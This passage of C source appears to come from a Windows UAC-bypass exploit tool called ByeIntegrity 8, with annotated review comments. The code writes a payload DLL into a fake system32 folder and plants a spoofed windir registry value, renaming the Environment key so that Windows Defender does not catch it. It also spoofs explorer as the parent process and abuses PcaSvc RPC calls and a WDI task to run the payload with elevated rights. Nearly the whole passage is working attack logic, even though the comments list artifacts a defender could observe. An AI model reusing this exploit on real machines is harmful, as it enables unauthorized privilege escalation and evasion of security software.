    security.Capabilities = RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH;
    security.Sid = sid;
    rStatus = RpcBindingSetAuthInfoExW(hBinding, NULL,
        RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT,
        0, 0, (RPC_SECURITY_QOS*)&security);
    if (rStatus) {
        wprintf(L"RpcBindingSetAuthInfoExW() failed. Error: %ld\n", rStatus);
        goto eof;
    }

    /* Ownership of hBinding passes to the caller. */
    *bindingHandle = hBinding;
    return rStatus;

eof:
    if (hBinding)
        RpcBindingFree(&hBinding);
    return rStatus;
}
276 |
/* Program entry point. The executable runs in four modes, chosen by the
 * first character of argv[0]; the parent passes "0" or "1" as the whole
 * command line in CreateProcessW() below, so the child sees it as argv[0]:
 *   '0'  : BiTriggerMain() — write the two ETW events PcaSvc reacts to
 *   '1'  : sleep 2 s and exit 0 (the usesPca == FALSE path)
 *   '2'  : stop the WDI ResolutionHost task, then signal "ByeIntegrity8Delete"
 *          (launched by something outside this file — presumably the payload)
 *   else : the orchestrator described next.
 *
 * Orchestrator flow, in source order:
 *   1. create a "system32" directory under the current directory and write
 *      the embedded PAYLOAD resource to system32\pcadm.dll;
 *   2. stop the WDI ResolutionHost task and make sure PcaSvc is running;
 *   3. publish this exe's full path in the named file mapping "ByeIntegrity8"
 *      and create the events "ByeIntegrity8Loaded" / "ByeIntegrity8Delete";
 *   4. temporarily write a "windir" value under HKCU\Environment pointing at
 *      the current directory;
 *   5. start a suspended copy of itself (parented to the shell process when
 *      usesPca) and hand it to PcaSvc over RPC;
 *   6. wait up to 20 s for "ByeIntegrity8Loaded", clean up, and wait up to
 *      20 s for "ByeIntegrity8Delete" before tearing everything down.
 *
 * Returns 0 when "ByeIntegrity8Loaded" was signalled, EXIT_FAILURE otherwise.
 *
 * Artifacts a defender can observe from this function alone: the system32
 * directory and pcadm.dll under the working directory; HKCU\Environment
 * being renamed and a windir value written there; the named objects
 * ByeIntegrity8, ByeIntegrity8Loaded and ByeIntegrity8Delete; a process
 * created with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS set to the shell
 * window's process; PcaSvc being started and the WDI task being stopped.
 *
 * NOTE(review): comReady is never set to TRUE, so the CoUninitialize() at
 * eof never runs even though CoInitializeEx() succeeded.
 * NOTE(review): the timeout message after WaitForSingleObject(hHijackEvent)
 * prints hr, which at that point is the stale CoInitializeEx() result.
 * NOTE(review): WriteFile()'s writtenBytes is never compared with the
 * resource size, so a short write goes unnoticed. */
int wmain(
    int argc,
    PWCHAR* argv
)
{
    if (argv[0][0] == L'0')
        return BiTriggerMain();
    if (argv[0][0] == L'1') {
        Sleep(2000);
        return 0;
    }
    if (argv[0][0] == L'2') {
        HRESULT hr;
        HANDLE hEvent;

        /* Opened, not created: the orchestrator must already have created it. */
        hEvent = OpenEventW(EVENT_MODIFY_STATE, FALSE, L"ByeIntegrity8Delete");
        if (!hEvent) {
            hr = HRESULT_FROM_WIN32(GetLastError());
            goto end;
        }

        hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE |
            COINIT_SPEED_OVER_MEMORY);
        if (!SUCCEEDED(hr))
            goto end;

        hr = BiStopWdiTask(FALSE);
        SetEvent(hEvent);
        CoUninitialize();

    end:
        if (hEvent)
            CloseHandle(hEvent);
        return (int)hr;
    }

    int exitCode = EXIT_FAILURE;
    WCHAR cmdLine[2];                       /* "0" or "1": the child's mode selector */
    PROCESS_INFORMATION processInfo = { NULL, NULL, 0 };
    STARTUPINFOEXW si;
    HRSRC resource;
    HGLOBAL loadedResource;
    LPVOID payload;
    HANDLE hPayload, hSharedMem = NULL;
    BOOLEAN createdSystemFake = FALSE, createdPayload = FALSE, comReady = FALSE, deleteList = FALSE;
    DWORD writtenBytes;
    HRESULT hr;
    DWORD curDirSize;
    PWSTR curDir = NULL;
    LSTATUS status;
    BOOLEAN taskHijacked = FALSE, usesPca = TRUE;
    PUCHAR pSharedMem = NULL;
    WCHAR exeName[MAX_PATH];
    DWORD exeNameSize;
    SIZE_T attrSize;
    HANDLE explorer = NULL;
    WCHAR keyName[9];                       /* 8 letters + NUL from AzGenRandomString() */
    SC_HANDLE scHandle = NULL, hService = NULL;
    SERVICE_STATUS serviceStatus;
    RPC_BINDING_HANDLE pcaBinding = NULL;
    RPC_STATUS rpcStatus;
    long pcaResult;
    HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE), hHijackEvent = NULL, hDeleteEvent = NULL;

    /* Banner: attribute 8 is dark grey, 7 restores the default light grey. */
    SetConsoleTextAttribute(hConsole, 8);
    _putws(L" __________ .___ __ .__ __ ______ \n" \
        L" \\______ \\___.__. ____ | | _____/ |_ ____ ___________|__|/ |_ ___.__. / __ \\ \n" \
        L" | | _< | |/ __ \\| |/ \\ __\\/ __ \\ / ___\\_ __ \\ \\ __< | | > < \n" \
        L" | | \\\\___ \\ ___/| | | \\ | \\ ___// /_/ > | \\/ || | \\___ | / -- \\\n" \
        L" |______ // ____|\\___ >___|___| /__| \\___ >___ /|__| |__||__| / ____| \\______ /\n" \
        L" \\/ \\/ \\/ \\/ \\/_____/ \\/ \\/ \n");
    SetConsoleTextAttribute(hConsole, 7);

    /* 0x7FFE026C / 0x7FFE0270 are KUSER_SHARED_DATA.NtMajorVersion /
     * NtMinorVersion; 6.1 is Windows 7, which takes the
     * RAiNotifyUserCallbackExceptionProcess() path (child mode "1").
     * Everything else uses RAiMonitorProcess() (child mode "0"). */
    if (*(PULONG)0x7FFE026C == 6 && *(PULONG)0x7FFE0270 == 1) {
        cmdLine[0] = L'1';
        cmdLine[1] = L'\0';
        usesPca = FALSE;
    }
    else {
        cmdLine[0] = L'0';
        cmdLine[1] = L'\0';
    }

    si.lpAttributeList = NULL;
    hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY);
    if (!SUCCEEDED(hr)) {
        wprintf(L"CoInitializeEx() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    /* comReady is meant to be set here; it never is (see note above). */

    /* Step 1: locate the embedded PAYLOAD resource (g_Instance / IDR_PAYLOAD1
     * are defined outside this excerpt). */
    resource = FindResourceW(g_Instance, MAKEINTRESOURCEW(IDR_PAYLOAD1), L"PAYLOAD");
    if (!resource) {
        wprintf(L"FindResourceW() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    loadedResource = LoadResource(g_Instance, resource);
    if (!loadedResource) {
        wprintf(L"LoadResource() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    payload = LockResource(loadedResource);
    if (!payload) {
        wprintf(L"LockResource() failed. Error: %lu\n", GetLastError());
        goto eof;
    }

    /* Relative path: "system32" is created under the current directory, which
     * is the same directory the windir value below will point at. */
    if (!CreateDirectoryW(L"system32", NULL)) {
        wprintf(L"CreateDirectoryW() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    createdSystemFake = TRUE;

    /* FILE_WRITE_ACCESS (the winioctl.h constant) rather than GENERIC_WRITE;
     * CREATE_NEW fails if the file already exists. */
    hPayload = CreateFileW(L"system32\\pcadm.dll", FILE_WRITE_ACCESS, FILE_SHARE_READ,
        NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hPayload == INVALID_HANDLE_VALUE) {
        wprintf(L"CreateFileW() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    createdPayload = TRUE;
    if (!WriteFile(hPayload, payload, SizeofResource(g_Instance, resource), &writtenBytes, NULL)) {
        CloseHandle(hPayload);
        wprintf(L"WriteFile() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    CloseHandle(hPayload);   /* writtenBytes is not checked against the resource size */

    /* Step 2: stop the WDI task (with tracing on) and start PcaSvc if needed. */
    if (!SUCCEEDED(BiStopWdiTask(TRUE)))
        goto eof;

    scHandle = OpenSCManagerW(NULL, SERVICES_ACTIVE_DATABASEW, SC_MANAGER_CONNECT);
    if (!scHandle) {
        wprintf(L"OpenSCManagerW() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    hService = OpenServiceW(scHandle, L"PcaSvc", SERVICE_START | SERVICE_QUERY_STATUS);
    if (!hService) {
        wprintf(L"OpenServiceW() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    if (!QueryServiceStatus(hService, &serviceStatus)) {
        wprintf(L"QueryServiceStatus() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    /* StartServiceW() returns as soon as the start is requested; there is no
     * wait for SERVICE_RUNNING before the RPC call below. */
    if (serviceStatus.dwCurrentState != SERVICE_RUNNING)
        if (!StartServiceW(hService, 0, NULL)) {
            wprintf(L"StartServiceW() failed. Error: %lu\n", GetLastError());
            goto eof;
        }

    /* Step 3: this exe's full path (exeNameSize = characters without NUL on
     * return) and the current directory are needed both for the RPC call and
     * for the shared mapping read by the payload. */
    exeNameSize = MAX_PATH;
    if (!QueryFullProcessImageNameW(GetCurrentProcess(), 0, exeName, &exeNameSize)) {
        wprintf(L"QueryFullProcessImageNameW() failed. Error: %lu\n", GetLastError());
        goto eof;
    }

    /* GetCurrentDirectoryW(0, NULL) returns the size including the NUL. */
    curDirSize = GetCurrentDirectoryW(0, NULL);
    curDir = HeapAlloc(GetProcessHeap(), 0, curDirSize * sizeof(WCHAR));
    if (curDir) {
        if (!GetCurrentDirectoryW(curDirSize, curDir)) {
            wprintf(L"GetCurrentDirectoryW() failed. Error: %lu\n", GetLastError());
            goto eof;
        }
    }
    else {
        wprintf(L"HeapAlloc() (0) failed. Error: %lu\n", GetLastError());
        goto eof;
    }

    /* Pagefile-backed named section holding exeName (path + NUL). */
    hSharedMem = CreateFileMappingW(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE,
        0, (exeNameSize + 1) * sizeof(WCHAR), L"ByeIntegrity8");
    if (!hSharedMem) {
        wprintf(L"CreateFileMappingW() failed. Error: %lu\n", GetLastError());
        goto eof;
    }

    pSharedMem = MapViewOfFile(hSharedMem, FILE_MAP_WRITE, 0, 0, 0);
    if (!pSharedMem) {
        wprintf(L"MapViewOfFile() failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    memcpy(pSharedMem, exeName, ((ULONG_PTR)exeNameSize + 1) * sizeof(WCHAR));

    /* Auto-reset, initially unsignalled; both are waited on near the end. */
    hHijackEvent = CreateEventW(NULL, FALSE, FALSE, L"ByeIntegrity8Loaded");
    if (!hHijackEvent) {
        wprintf(L"CreateEventW() (0) failed. Error: %lu\n", GetLastError());
        goto eof;
    }
    hDeleteEvent = CreateEventW(NULL, FALSE, FALSE, L"ByeIntegrity8Delete");
    if (!hDeleteEvent) {
        wprintf(L"CreateEventW() (1) failed. Error: %lu\n", GetLastError());
        goto eof;
    }

    /* Only the STARTUPINFOW part is zeroed; lpAttributeList was set to NULL
     * above and cb announces the extended structure. */
    ZeroMemory(&si.StartupInfo, sizeof(STARTUPINFOW));
    si.StartupInfo.cb = sizeof(STARTUPINFOEXW);

    /* On the RAiMonitorProcess() path the child is created with the shell
     * window's process (explorer) as its parent via a proc-thread attribute,
     * so the child's recorded parent is not this process. */
    if (usesPca) {
        /* First call only sizes the list; ERROR_INSUFFICIENT_BUFFER is expected. */
        if (!InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
            wprintf(L"InitializeProcThreadAttributeList() (0) failed. Error: %lu\n", GetLastError());
            goto eof;
        }
        si.lpAttributeList = HeapAlloc(GetProcessHeap(), 0, attrSize);
        if (si.lpAttributeList) {
            if (!InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize)) {
                wprintf(L"InitializeProcThreadAttributeList() (1) failed. Error: %lu\n", GetLastError());
                goto eof;
            }

            DWORD pid;

            /* pid is left as-is if there is no shell window; it is not pre-zeroed. */
            GetWindowThreadProcessId(GetShellWindow(), &pid);
            if (pid) {
                explorer = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, pid);
                if (explorer) {
                    if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &explorer,
                        sizeof(HANDLE), NULL, NULL)) {
                        wprintf(L"UpdateProcThreadAttribute() failed. Error: %lu\n", GetLastError());
                        goto eof;
                    }
                    deleteList = TRUE;   /* list is initialised: DeleteProcThreadAttributeList at eof */
                }
                else {
                    wprintf(L"OpenProcess() failed. Error: %lu\n", GetLastError());
                    goto eof;
                }
            }
            else {
                wprintf(L"GetWindowThreadProcessId() failed. Error: %lu\n", GetLastError());
                goto eof;
            }
        }
        else {
            wprintf(L"HeapAlloc() (1) failed. Error: %lu\n", GetLastError());
            goto eof;
        }
    }

    // Bypass Windows Defender filter driver catching custom windir creation
    /* Step 4: HKCU\Environment is renamed to a throwaway name, the windir
     * value is written under that name, and the key is renamed back. The
     * value is removed again at eofEarly / on the failure paths below. Both
     * the rename and the windir value are registry artifacts of this tool. */
    AzGenRandomString(keyName);
    status = RegRenameKey(HKEY_CURRENT_USER, L"Environment", keyName);
    if (status) {
        wprintf(L"RegRenameKey() failed. LSTATUS: %lu\n", status);
        goto eof;
    }
    status = RegSetKeyValueW(HKEY_CURRENT_USER, keyName, L"windir", REG_SZ, curDir,
        curDirSize * sizeof(WCHAR));
    RegRenameKey(HKEY_CURRENT_USER, keyName, L"Environment");   /* result ignored */
    if (status) {
        wprintf(L"RegSetKeyValueW() failed. LSTATUS: %lu\n", status);
        goto eof;
    }

    /* Step 5: suspended copy of this exe with cmdLine ("0"/"1") as its whole
     * command line. BOOL result stored in an LSTATUS variable. */
    status = (LSTATUS)CreateProcessW(exeName, cmdLine, NULL, NULL, FALSE, CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW,
        NULL, NULL, (LPSTARTUPINFOW)&si, &processInfo);
    if (!status) {
        wprintf(L"CreateProcessW() failed. Error: %lu\n", GetLastError());
        RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Environment", L"windir");
        goto eof;
    }

    /* See BiCreatePcaRpcBinding(): a CreateWellKnownSid() failure there
     * returns 0 with pcaBinding still NULL, which this check does not catch. */
    rpcStatus = BiCreatePcaRpcBinding(&pcaBinding);
    if (rpcStatus) {
        wprintf(L"BiCreatePcaRpcBinding() failed. Error: %#010x\n", rpcStatus);
        TerminateProcess(processInfo.hProcess, 0);
        RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Environment", L"windir");
        goto eof;
    }

    if (usesPca) {
        /* The process handle is passed by value as a 64-bit integer; the
         * parameter type comes from the IDL, outside this excerpt. RPC
         * failures surface as SEH exceptions, hence __try. */
        __try {
            pcaResult = RAiMonitorProcess(pcaBinding, (unsigned long long)processInfo.hProcess, 1,
                exeName, cmdLine, curDir, PCA_MONITOR_PROCESS_NORMAL);
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            TerminateProcess(processInfo.hProcess, 0);
            wprintf(L"RAiMonitorProcess() exception: %#010x\n", GetExceptionCode());
            goto eofEarly;
        }
        if (pcaResult) {
            TerminateProcess(processInfo.hProcess, 0);
            wprintf(L"RAiMonitorProcess() failed. Error: %ld\n", pcaResult);
            goto eofEarly;
        }

        /* Let the child run (mode "0": BiTriggerMain) and wait for it to exit.
         * curDirSize is reused here to hold the child's exit code. */
        ResumeThread(processInfo.hThread);
        WaitForSingleObject(processInfo.hProcess, INFINITE);
        GetExitCodeProcess(processInfo.hProcess, &curDirSize);
        if (curDirSize) {
            wprintf(L"Trigger process exited with error code: %#010x\n", curDirSize);
            goto eofEarly;
        }
    }
    else {
        /* Windows 7 path: the child (mode "1") is resumed first, then PcaSvc
         * is told about its PID. */
        ResumeThread(processInfo.hThread);

        __try {
            pcaResult = RAiNotifyUserCallbackExceptionProcess(pcaBinding,
                exeName, 1, processInfo.dwProcessId);
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {
            wprintf(L"RAiNotifyUserCallbackExceptionProcess() exception: %#010x\n", GetExceptionCode());
            goto eofEarly;
        }
        if (pcaResult) {
            wprintf(L"RAiNotifyUserCallbackExceptionProcess() failed. Error: %ld\n", pcaResult);
            goto eofEarly;
        }
    }

    /* Step 6: 20 s for the "loaded" signal. hr in this message is stale
     * (it still holds the CoInitializeEx() result). */
    if (WaitForSingleObject(hHijackEvent, 20000) == WAIT_TIMEOUT)
        wprintf(L"Diagnostic module task did not launch & exit properly. HRESULT: %#010x\n", hr);
    else
        taskHijacked = TRUE;

eofEarly:
    /* Registry cleanup; all return values are ignored. The Windows 7 branch
     * also clears the per-exe AppCompat entries under HKLM and HKCU, the
     * other branch the HKCU "Store" entry. */
    RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Environment", L"windir");
    if (!usesPca) {
        RegDeleteKeyValueW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers",
            exeName);
        RegDeleteKeyValueW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Persisted",
            exeName);
    }
    else
        RegDeleteKeyValueW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store",
            exeName);

    if (taskHijacked) {
        /* 15: bright white, 14: yellow, 7: default. */
        SetConsoleTextAttribute(hConsole, 15);
        wprintf(L">>> ");
        SetConsoleTextAttribute(hConsole, 14);
        _putws(L"Exploit successful\n");
        SetConsoleTextAttribute(hConsole, 7);

        exitCode = 0;
    }

    /* Give the mode-"2" instance up to 20 s to signal that it is done before
     * the payload file and directory are removed below. */
    WaitForSingleObject(hDeleteEvent, 20000);

eof:
    /* Teardown in reverse order of acquisition; every step is guarded by the
     * corresponding handle/flag so early failures reach here safely. */
    if (pcaBinding)
        RpcBindingFree(&pcaBinding);
    if (processInfo.hThread)
        CloseHandle(processInfo.hThread);
    if (processInfo.hProcess)
        CloseHandle(processInfo.hProcess);
    if (explorer)
        CloseHandle(explorer);
    if (hDeleteEvent)
        CloseHandle(hDeleteEvent);
    if (hHijackEvent)
        CloseHandle(hHijackEvent);
    if (pSharedMem)
        UnmapViewOfFile(pSharedMem);
    if (hSharedMem)
        CloseHandle(hSharedMem);
    if (curDir)
        HeapFree(GetProcessHeap(), 0, curDir);
    if (hService)
        CloseServiceHandle(hService);
    if (scHandle)
        CloseServiceHandle(scHandle);
    if (comReady)            /* never TRUE — CoUninitialize() is unreachable */
        CoUninitialize();
    if (createdPayload)
        DeleteFileW(L"system32\\pcadm.dll");
    if (createdSystemFake)
        RemoveDirectoryW(L"system32");
    if (deleteList)
        DeleteProcThreadAttributeList(si.lpAttributeList);
    if (si.lpAttributeList)
        HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    return exitCode;
}
650 |
--------------------------------------------------------------------------------
/diagram.svg:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------